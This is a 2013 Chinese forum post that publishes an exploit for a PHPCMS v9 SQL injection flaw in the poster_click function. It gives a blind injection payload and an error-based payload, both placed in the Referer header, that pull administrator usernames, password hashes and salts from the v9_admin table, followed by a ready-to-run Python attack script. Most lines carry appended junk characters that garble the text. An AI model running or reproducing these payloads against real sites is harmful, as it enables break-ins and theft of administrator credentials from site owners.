有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:
1 Q2 u0 g* B1 H# m7 `: H6 w% W# P* z3 k
问题函数\phpcms\modules\poster\index.php* T- B4 c `" u) V
( O- r$ |0 M+ `' {9 N. t
public function poster_click() {
+ f( s2 W: V, u+ h. @$id = isset($_GET['id']) ? intval($_GET['id']) : 0;
/ a$ O d G: r" M$r = $this->db->get_one(array('id'=>$id));* ^* G( Z) [% j2 g" ~
if (!is_array($r) && empty($r)) return false;4 F# H- O& g& M$ x) T) D
$ip_area = pc_base::load_sys_class('ip_area');( k, i4 R5 r$ r3 f
$ip = ip();2 N6 K0 s: @5 z! r
$area = $ip_area->get($ip);/ h, P+ k6 F" B: C0 z, h( a1 s
$username = param::get_cookie('username') ? param::get_cookie('username') : '';- ^$ r% t' l2 I. W
if($id) {4 I: N( z+ }; j. [- b( l7 M
$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();* W9 i, k3 P6 j
$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));7 `* e8 J- U7 l& f5 w2 v R s
}, |: J1 X$ M R: l3 \; Z
$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
# E: a4 u; z9 y1 d1 B0 E$setting = string2array($r['setting']);
% \0 o% V H# H/ @( Aif (count($setting)==1) {% I0 s! X) N' I- M- g
$url = $setting['1']['linkurl'];
# n- e1 Z& ]9 O+ U) w} else {
; y* d" ^8 f. u- y$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];
" I3 g4 f- J7 V4 u+ \}
3 }0 O: S' H( Sheader('Location: '.$url);
. l% O( _6 R+ I5 C}
, Y8 {$ c. o: a4 P( v) d' I/ C2 \7 l) v
' |, N; W* l' o8 z6 ~) p4 W. o. r) [
利用方式:0 D, c3 y( h# S
1 n9 D( e& T# v6 I
1、可以采用盲注入的手法:7 E! u+ _" A& e
5 W& \9 C/ N& G3 c
referer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#+ q$ D. k# ] V" X% [8 x
3 Y9 t* f- f/ i, I6 W
通过返回页面,正常与否一个个猜解密码字段。' H4 |' R5 p [7 r/ t9 p& U7 d
4 J" K: c& S- f* ]$ S
2、代码是花开写的,随手附上了:
4 \1 ?5 m! q1 n: T6 M+ i7 D! |; B- {7 ?
1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#) v- t" d: ?' E0 @/ @; g. Q" [
8 b$ ]+ L1 ]: G7 L+ n. I2 B- o, O
此方法是爆错注入手法,原理自查。0 G- L- j6 W" J: u
0 y7 B6 V9 @" Z/ K3 l8 R
9 {0 t, f" I I5 Q+ @+ M0 ]7 z$ {: D* r/ m1 |0 {
利用程序:
* f% p- y" b T# I$ g
: x1 ?5 l D6 Y' x# p#!/usr/bin/env python$ c0 e" ^2 B7 d" y
import httplib,sys,re
, `: r$ s3 X" E$ c* v# Q6 j. ]2 \$ ~5 l; q
def attack():' Z& n( [/ j" {$ |
print “Code by Pax.Mac Team conqu3r!”
) `2 i! o: y Q V1 X$ D4 H) Oprint “Welcome to our zone!!!”
3 g. I6 G* h2 J1 X9 H: x6 Q7 Iurl=sys.argv[1]
) }) s! C2 W/ @/ h9 u$ `( i& J |paths=sys.argv[2]0 q% z k" Q2 F. D! g0 y( a
conn = httplib.HTTPConnection(url)' {/ [' d/ A. Q; J' t+ z; a
i_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,
7 Z* Y5 F1 t4 ]3 j. P- w“Accept”: “text/plain”,/ p# Q8 P8 {- U R+ j
“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}9 A2 e0 W0 ?: \! n! c8 _2 Y
conn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)5 a) I6 l W6 i2 }6 t
r1 = conn.getresponse()
0 N# x4 C: N4 c/ c" k5 b- V( @7 kdatas=r1.read()
. A7 ?+ F# b% p) \( `1 m, |9 edatas=re.findall(r”Duplicate entry \’\w+’”, datas)
/ U$ W$ o( I: [, H7 z6 Rprint datas[0]- C! ^3 S7 {& }+ c5 B
conn.close()
* c& R/ f. T) |* Z C6 A4 Oif __name__==”__main__”:
2 n* X8 F* R7 I, k& o1 bif len(sys.argv)<3:8 u! a1 j$ F& ?+ p- |
print “Code by Pax.Mac Team conqu3r”4 S$ r' B. E' {1 ^/ A( P: Q( f H/ g# Y
print “Usgae:”
4 C1 p5 C9 N+ ]5 v' \% V5 E: x7 Vprint “ phpcmsattack.py www.paxmac.org /”% R' ^+ a, T9 k7 i9 `4 k
print “ phpcmsataack.py www.paxmac.org /phpcmsv9/”: ^- ~3 k- L! K+ F* A
sys.exit(1)
- A% S2 N: @. H, [# |; j. xattack()
8 D" a4 {6 S/ M H& H" J
0 O9 G9 A" p9 Q% I |
发表于 2013-1-11 21:01:00
收藏
支持
反对